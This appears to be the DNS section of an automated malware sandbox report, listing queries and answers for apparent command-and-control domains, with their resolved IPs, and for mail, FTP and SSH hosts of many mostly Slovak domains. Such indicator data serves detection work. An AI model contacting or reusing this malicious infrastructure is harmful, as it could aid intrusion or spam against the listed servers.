                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.114408016 CET192.168.2.41.1.1.10x8aefStandard query (0)www.predajpaliet.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.114631891 CET192.168.2.41.1.1.10xa366Standard query (0)www.sluchatka.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.117996931 CET192.168.2.41.1.1.10xc3fdStandard query (0)ivory.plala.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.120357037 CET192.168.2.41.1.1.10x4efbStandard query (0)fermatsk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.121129990 CET192.168.2.41.1.1.10x4977Standard query (0)www.elteconline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.121201038 CET192.168.2.41.1.1.10xd845Standard query (0)www.sport-tour.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.122526884 CET192.168.2.41.1.1.10x2909Standard query (0)www.izberatel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.125401974 CET192.168.2.41.1.1.10x88b0Standard query (0)ftp.dobrybicykel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.135433912 CET192.168.2.41.1.1.10x9418Standard query (0)ftp.daxter.fsnet.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.135925055 CET192.168.2.41.1.1.10x8141Standard query (0)www.abatek.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.136908054 CET192.168.2.41.1.1.10x29c1Standard query (0)www.eurisproagro.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.137423992 CET192.168.2.41.1.1.10x870cStandard query (0)ftp.clickbkk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.137626886 CET192.168.2.41.1.1.10xa3b7Standard query (0)ssh.aexoden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.137917042 CET192.168.2.41.1.1.10xe8d3Standard query (0)www.kingsway-hk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.138871908 CET192.168.2.41.1.1.10x4439Standard query (0)ftp.gabio.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.140460968 CET192.168.2.41.1.1.10x1761Standard query (0)ssh.kingsway-hk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.143618107 CET192.168.2.41.1.1.10xed3aStandard query (0)ftp.konic.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.703242064 CET192.168.2.41.1.1.10xc376Standard query (0)mail.straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:32.156852007 CET192.168.2.41.1.1.10xd845Standard query (0)www.sport-tour.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:58.627526045 CET192.168.2.4152.89.198.2140x587fStandard query (0)bparowe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.396070004 CET192.168.2.41.1.1.10x4192Standard query (0)imap.inhodinky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.402000904 CET192.168.2.41.1.1.10xa6c2Standard query (0)hokal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.717434883 CET192.168.2.41.1.1.10xa06bStandard query (0)gw2.mx.anafra.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.717943907 CET192.168.2.41.1.1.10xf364Standard query (0)ssh.predajpaliet.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.718970060 CET192.168.2.41.1.1.10xec0cStandard query (0)imap.rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.718970060 CET192.168.2.41.1.1.10x5d95Standard query (0)mail.oitacity.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.719765902 CET192.168.2.41.1.1.10x2d4bStandard query (0)piaggio-bratislava.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.723252058 CET192.168.2.41.1.1.10xc983Standard query (0)pop3.nakacho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.723252058 CET192.168.2.41.1.1.10x1bf1Standard query (0)pop3.kingsway-hk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.727071047 CET192.168.2.41.1.1.10x92b8Standard query (0)fermatsk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.727071047 CET192.168.2.41.1.1.10x1c51Standard query (0)ax-sk1-mx3.ignum.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.729289055 CET192.168.2.41.1.1.10x1592Standard query (0)mail.fermatsk.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.729289055 CET192.168.2.41.1.1.10x88e7Standard query (0)mailgate.elteconline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.730515003 CET192.168.2.41.1.1.10xebddStandard query (0)mx1.hostcreators.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.730515003 CET192.168.2.41.1.1.10x5322Standard query (0)smtp.brightright.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.736301899 CET192.168.2.41.1.1.10xd40cStandard query (0)relay3.dnsserver.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.736301899 CET192.168.2.41.1.1.10x50e8Standard query (0)mail.instalanova.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.738087893 CET192.168.2.41.1.1.10x666eStandard query (0)imap.emr.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.742237091 CET192.168.2.41.1.1.10x8978Standard query (0)relay1.exohosting.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.773257017 CET192.168.2.41.1.1.10xea3cStandard query (0)mailin2.kanapy.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.777512074 CET192.168.2.41.1.1.10x82fStandard query (0)mail.emmetisportfun.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.777580976 CET192.168.2.41.1.1.10xa2cStandard query (0)pop.rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.777767897 CET192.168.2.41.1.1.10x813dStandard query (0)mail.rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.777853012 CET192.168.2.41.1.1.10xcbecStandard query (0)rotas-sk.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.780042887 CET192.168.2.41.1.1.10x2a6aStandard query (0)relay.rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.780042887 CET192.168.2.41.1.1.10x6371Standard query (0)mx2.webhouse.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.780945063 CET192.168.2.41.1.1.10x8df1Standard query (0)mailgate.predajpaliet.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.783886909 CET192.168.2.41.1.1.10xad39Standard query (0)mail.straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.783886909 CET192.168.2.41.1.1.10x4815Standard query (0)imap.escolapatelli.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.784256935 CET192.168.2.41.1.1.10x4f94Standard query (0)mail.ericrothphoto.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.785538912 CET192.168.2.41.1.1.10xa4f6Standard query (0)ssh.e-art-studio.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.861941099 CET192.168.2.41.1.1.10x6f2Standard query (0)spona-na-ponozky.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.871944904 CET192.168.2.41.1.1.10x1e0Standard query (0)aquamat-liptov.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.871944904 CET192.168.2.41.1.1.10x6c10Standard query (0)ivory.plala.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.874368906 CET192.168.2.41.1.1.10xafadStandard query (0)eluxviaggi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.874686956 CET192.168.2.41.1.1.10xa8f0Standard query (0)merlynsociety.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.878695011 CET192.168.2.41.1.1.10x2c9fStandard query (0)dobrybicykel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.879019976 CET192.168.2.41.1.1.10x76a3Standard query (0)khi-ho.ne.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.879483938 CET192.168.2.41.1.1.10x818bStandard query (0)feio.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.879483938 CET192.168.2.41.1.1.10xc255Standard query (0)mail.feio.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.880048990 CET192.168.2.41.1.1.10x9bbStandard query (0)ftp.khi-ho.ne.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.880836010 CET192.168.2.41.1.1.10x8f68Standard query (0)animekingdom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.880836010 CET192.168.2.41.1.1.10xdf16Standard query (0)mail.daxter.fsnet.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.886394978 CET192.168.2.41.1.1.10x86a5Standard query (0)ftp.feio.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.887871981 CET192.168.2.41.1.1.10xcd2Standard query (0)mail.dobrybicykel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.911757946 CET192.168.2.41.1.1.10xd8Standard query (0)konic.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.918874979 CET192.168.2.41.1.1.10xdde7Standard query (0)ftp.daxter.fsnet.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.919253111 CET192.168.2.41.1.1.10x3df5Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.920428038 CET192.168.2.41.1.1.10x1609Standard query (0)gryffindorhouse.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.561927080 CET192.168.2.41.1.1.10x50e8Standard query (0)mail.instalanova.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.611866951 CET192.168.2.41.1.1.10x2a6aStandard query (0)relay.rotas.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.611918926 CET192.168.2.41.1.1.10x82fStandard query (0)mail.emmetisportfun.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.767538071 CET192.168.2.41.1.1.10x3df5Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:05.799854040 CET192.168.2.41.1.1.10x3df5Standard query (0)straznyanjel.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.424679041 CET192.168.2.41.1.1.10xaa05Standard query (0)humydrole.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:21.613225937 CET1.1.1.1192.168.2.40x73f2Name error (3)onualituyrs.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.064217091 CET1.1.1.1192.168.2.40xdd5aNo error (0)sumagulituyo.org34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.783638000 CET1.1.1.1192.168.2.40x8eedNo error (0)snukerukeutit.org104.198.2.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.757395983 CET1.1.1.1192.168.2.40x3458No error (0)lightseinsteniki.org34.143.166.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.219506979 CET1.1.1.1192.168.2.40xfb01No error (0)liuliuoumumy.org34.143.166.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.513315916 CET1.1.1.1192.168.2.40x82caNo error (0)stualialuyastrelia.net91.215.85.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.597491980 CET1.1.1.1192.168.2.40x4c46No error (0)bombertublestylebanws.fun104.21.13.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:41.597491980 CET1.1.1.1192.168.2.40x4c46No error (0)bombertublestylebanws.fun172.67.167.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.419359922 CET1.1.1.1192.168.2.40x8924Name error (3)dayfarrichjwclik.funnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.556073904 CET1.1.1.1192.168.2.40x577eNo error (0)neighborhoodfeelsa.fun172.67.143.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:42.556073904 CET1.1.1.1192.168.2.40x577eNo error (0)neighborhoodfeelsa.fun104.21.87.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc187.156.96.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc181.168.176.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072355986 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc187.156.96.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc181.168.176.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072408915 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc187.156.96.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc181.168.176.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.072468996 CET1.1.1.1192.168.2.40x65f9No error (0)ftpvoyager.cc180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.497947931 CET1.1.1.1192.168.2.40xf64eNo error (0)diagramfiremonkeyowwa.fun104.21.18.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.497947931 CET1.1.1.1192.168.2.40xf64eNo error (0)diagramfiremonkeyowwa.fun172.67.183.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:46.299297094 CET1.1.1.1192.168.2.40xff8fNo error (0)shpilliwilli.com104.21.45.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:46.299297094 CET1.1.1.1192.168.2.40xff8fNo error (0)shpilliwilli.com172.67.215.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:47.311315060 CET1.1.1.1192.168.2.40xc6f1No error (0)linkofstrumble.com104.21.88.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:47.311315060 CET1.1.1.1192.168.2.40xc6f1No error (0)linkofstrumble.com172.67.185.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:51.749486923 CET1.1.1.1192.168.2.40xeccdNo error (0)cream.hitsturbo.com104.21.46.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:51.749486923 CET1.1.1.1192.168.2.40xeccdNo error (0)cream.hitsturbo.com172.67.168.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398360968 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398422003 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.398493052 CET1.1.1.1192.168.2.40x1057No error (0)humydrole.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.519797087 CET1.1.1.1192.168.2.40xabb0No error (0)inhodinky.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.519797087 CET1.1.1.1192.168.2.40xabb0No error (0)inhodinky.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.521640062 CET1.1.1.1192.168.2.40x8579Name error (3)feio.jpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.528877020 CET1.1.1.1192.168.2.40xb6f7Server failure (2)daxter.fsnet.co.uknonenoneMX (Mail exchange)IN (0x0001)false
